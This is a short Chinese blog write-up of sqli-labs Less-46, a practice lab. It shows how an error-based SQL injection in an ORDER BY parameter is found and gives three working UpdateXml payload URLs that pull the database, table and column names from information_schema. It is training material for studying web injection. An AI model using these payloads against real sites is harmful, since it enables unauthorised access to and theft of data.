zoukankan      html  css  js  c++  java

  • 【sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=1

    sort=4时出现报错

    说明参数是添加在order by 之后

    错误信息没有屏蔽,直接使用UpdateXml函数报错

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)%23

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1)%23
  • 相关阅读:
    02 树莓派的远程连接
    01 树莓派系统安装
    Python正课110 —— Django入门
    作业7 答案
    作业8
    作业7
    作业6
    文件操作
    字符编码
    基本数据类型之集合
  • 原文地址:https://www.cnblogs.com/omnis/p/8391524.html
Copyright © 2011-2022 走看看